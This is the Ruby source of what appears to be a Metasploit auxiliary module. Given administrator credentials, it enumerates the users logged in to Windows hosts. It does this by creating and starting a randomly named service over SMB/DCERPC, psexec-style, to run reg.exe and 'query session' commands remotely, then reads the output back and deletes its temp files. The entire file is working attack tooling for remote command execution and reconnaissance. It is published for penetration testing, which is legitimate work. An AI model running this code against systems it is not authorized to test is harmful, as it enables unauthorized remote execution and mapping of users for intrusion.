344 lines
11 KiB
Ruby
344 lines
11 KiB
Ruby
##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# web site for more information on licensing and terms of use.
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# http://metasploit.com/
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##
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require 'msf/core'
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class Metasploit3 < Msf::Auxiliary
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# Exploit mixins should be called first
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include Msf::Exploit::Remote::SMB
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include Msf::Exploit::Remote::SMB::Authenticated
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include Msf::Auxiliary::Report
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include Msf::Auxiliary::Scanner
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include Msf::Exploit::Remote::DCERPC
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# Aliases for common classes
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SIMPLE = Rex::Proto::SMB::SimpleClient
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XCEPT = Rex::Proto::SMB::Exceptions
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CONST = Rex::Proto::SMB::Constants
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def initialize
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super(
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'Name' => 'Microsoft Windows Authenticated Logged In Users Enumeration',
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'Description' => %Q{
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This module uses a valid administrator username and password to enumerate users
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currently logged in, using a similar technique than the "psexec" utility provided
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by SysInternals. It uses reg.exe to query the HKU base registry key.
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},
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'Author' =>
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[
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'Royce Davis @R3dy__ <rdavis[at]accuvant.com>' # Metasploit module
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],
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'References' => [
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[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
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[ 'OSVDB', '3106'],
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[ 'URL', 'http://www.pentestgeek.com/2012/11/05/finding-logged-in-users-metasploit-module/' ],
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[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
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],
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'License' => MSF_LICENSE
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)
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register_options([
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OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
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OptString.new('USERNAME', [false, 'The name of a specific user to search for', '']),
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OptString.new('RPORT', [true, 'The Target port', 445]),
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OptString.new('WINPATH', [true, 'The name of the Windows directory', 'WINDOWS']),
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], self.class)
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deregister_options('RHOST')
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end
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def peer
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return "#{rhost}:#{rport}"
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end
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# This is the main controller function
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def run_host(ip)
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cmd = "%SYSTEMDRIVE%\\#{datastore['WINPATH']}\\SYSTEM32\\cmd.exe"
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bat = "%SYSTEMDRIVE%\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat"
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text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt"
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smbshare = datastore['SMBSHARE']
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#Try and authenticate with given credentials
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begin
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connect
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smb_login
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rescue StandardError => autherror
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print_error("#{peer} - #{autherror}")
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return
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end
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keys = get_hku(ip, smbshare, cmd, text, bat)
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if !keys
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cleanup_after(cmd, text, bat)
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disconnect
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return
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end
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keys.each do |key|
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check_hku_entry(key, ip, smbshare, cmd, text, bat)
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end
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cleanup_after(cmd, text, bat)
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disconnect
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end
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# This method runs reg.exe query HKU to get a list of each key within the HKU master key
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# Returns an array object
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def get_hku(ip, smbshare, cmd, text, bat)
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begin
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# Try and query HKU
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command = "#{cmd} /C echo reg.exe QUERY HKU ^> %SYSTEMDRIVE%#{text} > #{bat} & #{cmd} /C start cmd.exe /C #{bat}"
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out = psexec(command)
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output = get_output(ip, smbshare, text)
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cleanout = Array.new
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output.each_line { |line| cleanout << line.chomp if line.include?("HKEY") && line.split("-").size == 8 && !line.split("-")[7].include?("_")}
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return cleanout
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rescue StandardError => hku_error
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print_error("#{peer} - Error runing query against HKU. #{hku_error.class}. #{hku_error}")
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return nil
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end
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end
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# This method will retrive output from a specified textfile on the remote host
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def get_output(ip, smbshare, file)
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begin
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simple.connect("\\\\#{ip}\\#{smbshare}")
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outfile = simple.open(file, 'ro')
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output = outfile.read
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outfile.close
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simple.disconnect("\\\\#{ip}\\#{smbshare}")
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return output
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rescue StandardError => output_error
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print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.")
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return false
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end
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end
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def report_user(username)
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report_note(
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:host => rhost,
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:proto => 'tcp',
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:sname => 'smb',
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:port => rport,
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:type => 'smb.domain.loggedusers',
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:data => "#{username} is logged in",
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:update => :unique_data
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)
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end
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# This method checks a provided HKU entry to determine if it is a valid SID
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# Either returns nil or returns the name of a valid user
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def check_hku_entry(key, ip, smbshare, cmd, text, bat)
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begin
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key = key.split("HKEY_USERS\\")[1].chomp
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command = "#{cmd} /C echo reg.exe QUERY \"HKU\\#{key}\\Volatile Environment\" ^> %SYSTEMDRIVE%#{text} > #{bat} & #{cmd} /C start cmd.exe /C #{bat}"
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out = psexec(command)
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if output = get_output(ip, smbshare, text)
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domain, username, dnsdomain, homepath, logonserver = "","","","",""
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# Run this IF loop and only check for specified user if datastore['USERNAME'] is specified
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if datastore['USERNAME'].length > 0
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output.each_line do |line|
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username = line if line.include?("USERNAME")
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domain = line if line.include?("USERDOMAIN")
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end
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if domain.split(" ")[2].to_s.chomp + "\\" + username.split(" ")[2].to_s.chomp == datastore['USERNAME']
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print_good("#{peer} - #{datastore['USERNAME']} is logged in")
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report_user(datastore['USERNAME'])
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end
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return
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end
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output.each_line do |line|
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domain = line if line.include?("USERDOMAIN")
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username = line if line.include?("USERNAME")
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dnsdomain = line if line.include?("USERDNSDOMAIN")
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homepath = line if line.include?("HOMEPATH")
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logonserver = line if line.include?("LOGONSERVER")
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end
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if username.length > 0 && domain.length > 0
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user = domain.split(" ")[2].to_s + "\\" + username.split(" ")[2].to_s
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print_good("#{peer} - #{user}")
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report_user(user.chomp)
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elsif logonserver.length > 0 && homepath.length > 0
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uname = homepath.split('\\')[homepath.split('\\').size - 1]
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if uname.include?(".")
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uname = uname.split(".")[0]
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end
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user = logonserver.split('\\\\')[1].chomp.to_s + "\\" + uname.to_s
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print_good("#{peer} - #{user}")
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report_user(user.chomp)
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else
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username = query_session(smbshare, ip, cmd, text, bat)
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if username
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hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "."
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user = "#{hostname}\\#{username}"
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print_good("#{peer} - #{user}")
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report_user(user.chomp)
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else
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print_status("#{peer} - Unable to determine user information for user: #{key}")
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end
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end
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else
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print_status("#{peer} - Could not determine logged in users")
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end
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rescue Rex::Proto::SMB::Exceptions::Error => check_error
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print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}")
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return check_error
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end
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end
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# Cleanup module. Gets rid of .txt and .bat files created in the #{datastore['WINPATH']}\Temp directory
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def cleanup_after(cmd, text, bat)
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begin
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# Try and do cleanup command
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cleanup = "#{cmd} /C del %SYSTEMDRIVE%#{text} & del #{bat}"
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print_status("#{peer} - Executing cleanup")
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out = psexec(cleanup)
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rescue StandardError => cleanuperror
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print_error("#{peer} - Unable to processes cleanup commands: #{cleanuperror}")
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print_warning("#{peer} - Maybe %SYSTEMDRIVE%#{text} must be deleted manually")
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print_warning("#{peer} - Maybe #{bat} must be deleted manually")
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return cleanuperror
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end
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end
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# Method trys to use "query session" to determine logged in user
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def query_session(smbshare, ip, cmd, text, bat)
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begin
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command = "#{cmd} /C echo query session ^> %SYSTEMDRIVE%#{text} > #{bat} & #{cmd} /C start cmd.exe /C #{bat}"
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out = psexec(command)
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userline = ""
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if output = get_output(ip, smbshare, text)
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output.each_line { |line| userline << line if line[0] == '>' }
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else
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return nil
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end
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return userline.split(" ")[1].chomp
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rescue
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return nil
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end
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end
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# This code was stolen straight out of psexec.rb. Thanks very much HDM and all who contributed to that module!!
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# Instead of uploading and runing a binary. This method runs a single windows command fed into the #{command} paramater
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def psexec(command)
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simple.connect("IPC$")
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handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
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vprint_status("#{peer} - Binding to #{handle} ...")
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dcerpc_bind(handle)
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vprint_status("#{peer} - Bound to #{handle} ...")
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vprint_status("#{peer} - Obtaining a service manager handle...")
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scm_handle = nil
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stubdata =
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NDR.uwstring("\\\\#{rhost}") +
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NDR.long(0) +
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NDR.long(0xF003F)
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begin
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response = dcerpc.call(0x0f, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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scm_handle = dcerpc.last_response.stub_data[0,20]
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end
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rescue ::Exception => e
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print_error("#{peer} - Error: #{e}")
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return false
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end
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servicename = Rex::Text.rand_text_alpha(11)
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displayname = Rex::Text.rand_text_alpha(16)
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holdhandle = scm_handle
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svc_handle = nil
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svc_status = nil
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stubdata =
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scm_handle +
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NDR.wstring(servicename) +
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NDR.uwstring(displayname) +
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NDR.long(0x0F01FF) + # Access: MAX
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NDR.long(0x00000110) + # Type: Interactive, Own process
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NDR.long(0x00000003) + # Start: Demand
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NDR.long(0x00000000) + # Errors: Ignore
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NDR.wstring( command ) +
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NDR.long(0) + # LoadOrderGroup
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NDR.long(0) + # Dependencies
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NDR.long(0) + # Service Start
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NDR.long(0) + # Password
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NDR.long(0) + # Password
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NDR.long(0) + # Password
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NDR.long(0) # Password
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begin
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vprint_status("#{peer} - Creating the service...")
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response = dcerpc.call(0x0c, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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svc_handle = dcerpc.last_response.stub_data[0,20]
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svc_status = dcerpc.last_response.stub_data[24,4]
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end
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rescue ::Exception => e
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print_error("#{peer} - Error: #{e}")
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return false
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end
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vprint_status("#{peer} - Closing service handle...")
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begin
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response = dcerpc.call(0x0, svc_handle)
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rescue ::Exception
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end
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vprint_status("#{peer} - Opening service...")
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begin
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stubdata =
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scm_handle +
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NDR.wstring(servicename) +
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NDR.long(0xF01FF)
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response = dcerpc.call(0x10, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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svc_handle = dcerpc.last_response.stub_data[0,20]
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end
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rescue ::Exception => e
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print_error("#{peer} - Error: #{e}")
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return false
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end
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vprint_status("#{peer} - Starting the service...")
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stubdata =
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svc_handle +
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NDR.long(0) +
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NDR.long(0)
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begin
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response = dcerpc.call(0x13, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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end
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rescue ::Exception => e
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print_error("#{peer} - Error: #{e}")
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return false
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end
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vprint_status("#{peer} - Removing the service...")
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stubdata =
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svc_handle
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begin
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response = dcerpc.call(0x02, stubdata)
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if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
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end
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rescue ::Exception => e
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print_error("#{peer} - Error: #{e}")
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end
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vprint_status("#{peer} - Closing service handle...")
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begin
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response = dcerpc.call(0x0, svc_handle)
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rescue ::Exception => e
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print_error("#{peer} - Error: #{e}")
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end
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select(nil, nil, nil, 1.0)
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simple.disconnect("IPC$")
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return true
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end
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end
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